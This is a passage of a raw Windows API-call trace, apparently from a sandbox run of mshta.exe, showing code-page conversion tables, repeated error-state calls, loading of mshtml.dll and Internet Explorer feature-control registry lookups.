\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x41f78c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xb2\xc7\xd4\xa5\xc4\xfa\x41", lpUsedDefaultChar=0x0) returned 256 [0213.813] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xb4b0f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0213.813] GetLastError () returned 0x0 [0213.813] SetLastError (dwErrCode=0x0) [0213.813] GetLastError () returned 0x0 [0213.813] SetLastError (dwErrCode=0x0) [0213.814] GetLastError () returned 0x0 [0213.814] SetLastError (dwErrCode=0x0) [0213.814] GetLastError () returned 0x0 [0213.814] SetLastError (dwErrCode=0x0) [0213.814] GetLastError () returned 0x0 [0213.814] SetLastError (dwErrCode=0x0) [0213.814] GetLastError () returned 0x0 [0213.814] SetLastError (dwErrCode=0x0) [0213.814] GetLastError () returned 0x0 [0213.814] SetLastError (dwErrCode=0x0) [0213.814] GetLastError () returned 0x0 [0213.814] SetLastError (dwErrCode=0x0) [0213.816] GetLastError () returned 0x0 [0213.816] SetLastError (dwErrCode=0x0) [0213.816] GetLastError () returned 0x0 [0213.816] SetLastError (dwErrCode=0x0) [0213.816] GetLastError () returned 0x0 [0213.816] SetLastError (dwErrCode=0x0) [0213.816] GetLastError () returned 0x0 [0213.816] SetLastError (dwErrCode=0x0) [0213.816] GetLastError () returned 0x0 [0213.816] SetLastError (dwErrCode=0x0) [0213.816] GetLastError () returned 0x0 [0213.816] SetLastError (dwErrCode=0x0) [0213.816] GetLastError () returned 0x0 [0213.816] SetLastError (dwErrCode=0x0) [0213.817] GetLastError () returned 0x0 [0213.817] SetLastError (dwErrCode=0x0) [0213.817] GetLastError () returned 0x0 [0213.817] SetLastError (dwErrCode=0x0) [0213.817] GetLastError () returned 0x0 [0213.817] SetLastError (dwErrCode=0x0) [0213.817] GetLastError () returned 0x0 [0213.817] SetLastError (dwErrCode=0x0) [0213.817] GetLastError () returned 0x0 [0213.817] SetLastError (dwErrCode=0x0) [0213.817] GetLastError () returned 0x0 [0213.817] SetLastError (dwErrCode=0x0) [0213.817] GetLastError () returned 0x0 [0213.817] SetLastError (dwErrCode=0x0) [0213.817] GetLastError () returned 0x0 [0213.817] SetLastError (dwErrCode=0x0) [0213.817] GetLastError () returned 0x0 [0213.817] SetLastError (dwErrCode=0x0) [0213.817] GetLastError () returned 0x0 [0213.817] SetLastError (dwErrCode=0x0) [0213.817] GetLastError () returned 0x0 [0213.817] SetLastError (dwErrCode=0x0) [0213.817] GetLastError () returned 0x0 [0213.818] SetLastError (dwErrCode=0x0) [0213.818] GetLastError () returned 0x0 [0213.818] SetLastError (dwErrCode=0x0) [0213.818] GetLastError () returned 0x0 [0213.818] SetLastError (dwErrCode=0x0) [0213.818] GetLastError () returned 0x0 [0213.818] SetLastError (dwErrCode=0x0) [0213.818] GetLastError () returned 0x0 [0213.818] SetLastError (dwErrCode=0x0) [0213.818] GetLastError () returned 0x0 [0213.818] SetLastError (dwErrCode=0x0) [0213.818] GetLastError () returned 0x0 [0213.818] SetLastError (dwErrCode=0x0) [0213.818] GetLastError () returned 0x0 [0213.818] SetLastError (dwErrCode=0x0) [0213.818] GetLastError () returned 0x0 [0213.818] SetLastError (dwErrCode=0x0) [0213.818] GetLastError () returned 0x0 [0213.818] SetLastError (dwErrCode=0x0) [0213.818] GetLastError () returned 0x0 [0213.818] SetLastError (dwErrCode=0x0) [0213.818] GetLastError () returned 0x0 [0213.818] SetLastError (dwErrCode=0x0) [0213.818] GetLastError () returned 0x0 [0213.819] SetLastError (dwErrCode=0x0) [0213.819] GetLastError () returned 0x0 [0213.819] SetLastError (dwErrCode=0x0) [0213.819] GetLastError () returned 0x0 [0213.819] SetLastError (dwErrCode=0x0) [0213.819] GetLastError () returned 0x0 [0213.819] SetLastError (dwErrCode=0x0) [0213.819] GetLastError () returned 0x0 [0213.819] SetLastError (dwErrCode=0x0) [0213.819] GetLastError () returned 0x0 [0213.819] SetLastError (dwErrCode=0x0) [0213.819] GetLastError () returned 0x0 [0213.819] SetLastError (dwErrCode=0x0) [0213.819] GetLastError () returned 0x0 [0213.819] SetLastError (dwErrCode=0x0) [0213.819] GetLastError () returned 0x0 [0213.819] SetLastError (dwErrCode=0x0) [0213.819] GetLastError () returned 0x0 [0213.819] SetLastError (dwErrCode=0x0) [0213.819] GetLastError () returned 0x0 [0213.820] SetLastError (dwErrCode=0x0) [0213.820] GetLastError () returned 0x0 [0213.820] SetLastError (dwErrCode=0x0) [0213.820] GetLastError () returned 0x0 [0213.820] SetLastError (dwErrCode=0x0) [0213.820] GetLastError () returned 0x0 [0213.820] SetLastError (dwErrCode=0x0) [0213.820] GetLastError () returned 0x0 [0213.820] SetLastError (dwErrCode=0x0) [0213.820] GetLastError () returned 0x0 [0213.820] SetLastError (dwErrCode=0x0) [0213.820] GetLastError () returned 0x0 [0213.820] SetLastError (dwErrCode=0x0) [0213.820] GetLastError () returned 0x0 [0213.820] SetLastError (dwErrCode=0x0) [0213.820] GetLastError () returned 0x0 [0213.820] SetLastError (dwErrCode=0x0) [0213.820] GetLastError () returned 0x0 [0213.820] SetLastError (dwErrCode=0x0) [0213.820] GetLastError () returned 0x0 [0213.820] SetLastError (dwErrCode=0x0) [0213.820] GetLastError () returned 0x0 [0213.820] SetLastError (dwErrCode=0x0) [0213.820] GetLastError () returned 0x0 [0213.820] SetLastError (dwErrCode=0x0) [0213.821] GetLastError () returned 0x0 [0213.821] SetLastError (dwErrCode=0x0) [0213.821] GetLastError () returned 0x0 [0213.821] SetLastError (dwErrCode=0x0) [0213.821] GetLastError () returned 0x0 [0213.821] SetLastError (dwErrCode=0x0) [0213.821] GetLastError () returned 0x0 [0213.821] SetLastError (dwErrCode=0x0) [0213.821] GetLastError () returned 0x0 [0213.821] SetLastError (dwErrCode=0x0) [0213.821] GetLastError () returned 0x0 [0213.821] SetLastError (dwErrCode=0x0) [0213.821] GetLastError () returned 0x0 [0213.821] SetLastError (dwErrCode=0x0) [0213.821] GetLastError () returned 0x0 [0213.821] SetLastError (dwErrCode=0x0) [0213.821] GetLastError () returned 0x0 [0213.821] SetLastError (dwErrCode=0x0) [0213.821] GetLastError () returned 0x0 [0213.821] SetLastError (dwErrCode=0x0) [0213.822] GetLastError () returned 0x0 [0213.822] SetLastError (dwErrCode=0x0) [0213.822] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x140) returned 0x2e1610 [0213.822] GetLastError () returned 0x0 [0213.822] SetLastError (dwErrCode=0x0) [0213.822] GetLastError () returned 0x0 [0213.822] SetLastError (dwErrCode=0x0) [0213.822] GetLastError () returned 0x0 [0213.822] SetLastError (dwErrCode=0x0) [0213.822] GetLastError () returned 0x0 [0213.822] SetLastError (dwErrCode=0x0) [0213.822] GetLastError () returned 0x0 [0213.822] SetLastError (dwErrCode=0x0) [0213.822] GetLastError () returned 0x0 [0213.822] SetLastError (dwErrCode=0x0) [0213.822] GetLastError () returned 0x0 [0213.822] SetLastError (dwErrCode=0x0) [0213.822] GetLastError () returned 0x0 [0213.822] SetLastError (dwErrCode=0x0) [0213.822] GetLastError () returned 0x0 [0213.822] SetLastError (dwErrCode=0x0) [0213.822] GetLastError () returned 0x0 [0213.822] SetLastError (dwErrCode=0x0) [0213.822] GetLastError () returned 0x0 [0213.822] SetLastError (dwErrCode=0x0) [0213.822] GetLastError () returned 0x0 [0213.823] SetLastError (dwErrCode=0x0) [0213.823] GetLastError () returned 0x0 [0213.823] SetLastError (dwErrCode=0x0) [0213.823] GetLastError () returned 0x0 [0213.823] SetLastError (dwErrCode=0x0) [0213.823] GetLastError () returned 0x0 [0213.823] SetLastError (dwErrCode=0x0) [0213.823] GetLastError () returned 0x0 [0213.823] SetLastError (dwErrCode=0x0) [0213.823] GetLastError () returned 0x0 [0213.823] SetLastError (dwErrCode=0x0) [0213.823] GetLastError () returned 0x0 [0213.823] SetLastError (dwErrCode=0x0) [0213.823] GetLastError () returned 0x0 [0213.823] SetLastError (dwErrCode=0x0) [0213.823] GetLastError () returned 0x0 [0213.823] SetLastError (dwErrCode=0x0) [0213.823] GetLastError () returned 0x0 [0213.823] SetLastError (dwErrCode=0x0) [0213.823] GetLastError () returned 0x0 [0213.823] SetLastError (dwErrCode=0x0) [0213.823] GetLastError () returned 0x0 [0213.823] SetLastError (dwErrCode=0x0) [0213.823] GetLastError () returned 0x0 [0213.823] SetLastError (dwErrCode=0x0) [0213.824] GetLastError () returned 0x0 [0213.824] SetLastError (dwErrCode=0x0) [0213.824] GetLastError () returned 0x0 [0213.824] SetLastError (dwErrCode=0x0) [0213.824] GetLastError () returned 0x0 [0213.824] SetLastError (dwErrCode=0x0) [0213.824] GetLastError () returned 0x0 [0213.824] SetLastError (dwErrCode=0x0) [0213.824] GetLastError () returned 0x0 [0213.824] SetLastError (dwErrCode=0x0) [0213.824] GetLastError () returned 0x0 [0213.824] SetLastError (dwErrCode=0x0) [0213.824] GetLastError () returned 0x0 [0213.824] SetLastError (dwErrCode=0x0) [0213.824] GetLastError () returned 0x0 [0213.824] SetLastError (dwErrCode=0x0) [0213.824] GetLastError () returned 0x0 [0213.824] SetLastError (dwErrCode=0x0) [0213.824] GetLastError () returned 0x0 [0213.824] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x5fc) returned 0x2e1758 [0213.824] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2e0e78 | out: hHeap=0x2e0000) returned 1 [0213.827] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xb42aef) returned 0x0 [0213.827] GetLastError () returned 0x0 [0213.827] GetVersion () returned 0x1db10106 [0213.827] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x76180000 [0213.827] GetProcAddress (hModule=0x76180000, lpProcName="HeapSetInformation") returned 0x76195651 [0213.827] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0213.828] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x105) returned 0x2e1d60 [0213.828] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x105) returned 0x2e1e70 [0213.828] RegOpenKeyExA (in: hKey=0x80000000, lpSubKey="clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", ulOptions=0x0, samDesired=0x1, phkResult=0x41fb24 | out: phkResult=0x41fb24*=0x42) returned 0x0 [0213.828] RegQueryValueExA (in: hKey=0x42, lpValueName=0x0, lpReserved=0x0, lpType=0x41fb1c, lpData=0x2e1d60, lpcbData=0x41fb18*=0x105 | out: lpType=0x41fb1c*=0x1, lpData="C:\\Windows\\SysWOW64\\mshtml.dll", lpcbData=0x41fb18*=0x1f) returned 0x0 [0213.828] LoadLibraryA (lpLibFileName="C:\\Windows\\SysWOW64\\mshtml.dll") returned 0x73f40000 [0221.025] GetProcessHeap () returned 0x470000 [0221.025] GetVersion () returned 0x1db10106 [0221.025] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x76180000 [0221.025] GetProcAddress (hModule=0x76180000, lpProcName="HeapSetInformation") returned 0x76195651 [0221.025] HeapSetInformation (HeapHandle=0x470000, HeapInformationClass=0x0, HeapInformation=0x41f7b0, HeapInformationLength=0x4) returned 1 [0221.288] malloc (_Size=0x80) returned 0x722640 [0221.289] GetVersion () returned 0x1db10106 [0221.297] GetVersionExA (in: lpVersionInformation=0x41f688*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x41f688*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0221.297] __dllonexit () returned 0x7416717c [0221.297] __dllonexit () returned 0x741673bd [0221.297] GetProcessHeap () returned 0x470000 [0221.297] __dllonexit () returned 0x74167435 [0221.297] __dllonexit () returned 0x74166e75 [0221.298] __dllonexit () returned 0x74166ff5 [0221.298] __dllonexit () returned 0x741671be [0221.298] __dllonexit () returned 0x741672e2 [0221.298] __dllonexit () returned 0x74167320 [0221.298] __dllonexit () returned 0x74167370 [0221.298] __dllonexit () returned 0x74166e53 [0221.298] __dllonexit () returned 0x74166e66 [0221.298] __dllonexit () returned 0x74166a3e [0221.298] __dllonexit () returned 0x74166a46 [0221.298] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc14a [0221.298] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc14a [0221.298] __dllonexit () returned 0x74166a60 [0221.298] __dllonexit () returned 0x74166a7a [0221.299] __dllonexit () returned 0x74166a93 [0221.299] __dllonexit () returned 0x74166aa7 [0221.299] __dllonexit () returned 0x74166ac1 [0221.299] __dllonexit () returned 0x741671f1 [0221.299] __dllonexit () returned 0x74166ad0 [0221.299] __dllonexit () returned 0x74166adf [0221.299] __dllonexit () returned 0x74166aee [0221.299] __dllonexit () returned 0x74166afd [0221.299] __dllonexit () returned 0x74166b0d [0221.299] __dllonexit () returned 0x7416720c [0221.299] __dllonexit () returned 0x74166b1c [0221.299] __dllonexit () returned 0x74166b2f [0221.299] __dllonexit () returned 0x74166b49 [0221.299] __dllonexit () returned 0x74166b58 [0221.299] __dllonexit () returned 0x74166b67 [0221.299] __dllonexit () returned 0x74166b76 [0221.300] __dllonexit () returned 0x74166b85 [0221.300] __dllonexit () returned 0x74166b94 [0221.300] __dllonexit () returned 0x74166ba3 [0221.300] __dllonexit () returned 0x74166bb2 [0221.300] __dllonexit () returned 0x74166bc1 [0221.300] __dllonexit () returned 0x74166bd0 [0221.300] __dllonexit () returned 0x74166bdf [0221.300] __dllonexit () returned 0x74166bee [0221.300] __dllonexit () returned 0x74166bfd [0221.300] __dllonexit () returned 0x74166c0c [0221.300] __dllonexit () returned 0x74166c1b [0221.300] __dllonexit () returned 0x74166c2a [0221.300] __dllonexit () returned 0x74166c3d [0221.300] __dllonexit () returned 0x74166c4c [0221.300] __dllonexit () returned 0x74166c5b [0221.300] __dllonexit () returned 0x74166c75 [0221.301] __dllonexit () returned 0x74166c8f [0221.301] __dllonexit () returned 0x74166ca9 [0221.301] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153 [0221.301] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153 [0221.301] __dllonexit () returned 0x74166cb1 [0221.301] __dllonexit () returned 0x74167294 [0221.301] __dllonexit () returned 0x74166ccb [0221.301] __dllonexit () returned 0x74166cd3 [0221.301] __dllonexit () returned 0x74166ce2 [0221.301] __dllonexit () returned 0x74166cf1 [0221.301] __dllonexit () returned 0x74166d00 [0221.301] __dllonexit () returned 0x7415f72d [0221.301] __dllonexit () returned 0x74166d43 [0221.302] __dllonexit () returned 0x74166d56 [0221.302] __dllonexit () returned 0x7415f095 [0221.302] __dllonexit () returned 0x74166d65 [0221.302] __dllonexit () returned 0x74166d78 [0221.302] __dllonexit () returned 0x74166d87 [0221.302] __dllonexit () returned 0x74166d9a [0221.302] __dllonexit () returned 0x74162256 [0221.302] __dllonexit () returned 0x7416679d [0221.302] __dllonexit () returned 0x74166dd5 [0221.302] __dllonexit () returned 0x74166df8 [0221.302] __dllonexit () returned 0x74166e07 [0221.302] __dllonexit () returned 0x741676cb [0221.302] __dllonexit () returned 0x74166e1a [0221.302] __dllonexit () returned 0x741672aa [0221.303] __dllonexit () returned 0x741672cb [0221.303] __dllonexit () returned 0x74166e3a [0221.303] GetCurrentThreadId () returned 0x390 [0221.303] CoCreateGuid (in: pguid=0x7447ad20 | out: pguid=0x7447ad20*(Data1=0x95928d4b, Data2=0xa562, Data3=0x4650, Data4=([0]=0xb4, [1]=0xa7, [2]=0xf4, [3]=0x36, [4]=0xc5, [5]=0xf8, [6]=0xed, [7]=0xb2))) returned 0x0 [0221.304] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x200) returned 0x48e760 [0221.304] __dllonexit () returned 0x7416733d [0221.304] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x41f128, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0221.304] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0221.304] StrCmpICW (pszStr1="mshta.exe", pszStr2="iexplore.exe") returned 4 [0221.304] StrCmpICW (pszStr1="mshta.exe", pszStr2="explorer.exe") returned 8 [0221.304] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x48e968 [0221.304] SHRegGetValueW () returned 0x2 [0221.304] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f374 | out: phkResult=0x41f374*=0x0) returned 0x2 [0221.305] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f370 | out: phkResult=0x41f370*=0x0) returned 0x2 [0221.305] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f368 | out: phkResult=0x41f368*=0x94) returned 0x0 [0221.305] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f36c | out: phkResult=0x41f36c*=0x98) returned 0x0 [0221.458] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.506] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.506] RegCloseKey (hKey=0x0) returned 0x6 [0221.506] RegCloseKey (hKey=0x0) returned 0x6 [0221.506] RegCloseKey (hKey=0x94) returned 0x0 [0221.506] RegCloseKey (hKey=0x98) returned 0x0 [0221.506] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f368 | out: phkResult=0x41f368*=0x98) returned 0x0 [0221.506] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f36c | out: phkResult=0x41f36c*=0x94) returned 0x0 [0221.506] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.506] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.506] RegCloseKey (hKey=0x0) returned 0x6 [0221.506] RegCloseKey (hKey=0x0) returned 0x6 [0221.506] RegCloseKey (hKey=0x98) returned 0x0 [0221.506] RegCloseKey (hKey=0x94) returned 0x0 [0221.507] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f368 | out: phkResult=0x41f368*=0x94) returned 0x0 [0221.507] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f36c | out: phkResult=0x41f36c*=0x98) returned 0x0 [0221.507] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.509] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.509] RegCloseKey (hKey=0x0) returned 0x6 [0221.509] RegCloseKey (hKey=0x0) returned 0x6 [0221.509] RegCloseKey (hKey=0x94) returned 0x0 [0221.509] RegCloseKey (hKey=0x98) returned 0x0 [0221.509] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f368 | out: phkResult=0x41f368*=0x98) returned 0x0 [0221.509] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f36c | out: phkResult=0x41f36c*=0x94) returned 0x0 [0221.509] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.509] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x9c) returned 0x0 [0221.509] SHRegGetValueW () returned 0x2 [0221.509] SHRegGetValueW () returned 0x2 [0221.509] RegCloseKey (hKey=0x9c) returned 0x0 [0221.509] RegCloseKey (hKey=0x0) returned 0x6 [0221.510] RegCloseKey (hKey=0x0) returned 0x6 [0221.510] RegCloseKey (hKey=0x98) returned 0x0 [0221.510] RegCloseKey (hKey=0x94) returned 0x0 [0221.510] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f368 | out: phkResult=0x41f368*=0x94) returned 0x0 [0221.510] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f36c | out: phkResult=0x41f36c*=0x98) returned 0x0 [0221.517] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.517] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.517] RegCloseKey (hKey=0x0) returned 0x6 [0221.517] RegCloseKey (hKey=0x0) returned 0x6 [0221.517] RegCloseKey 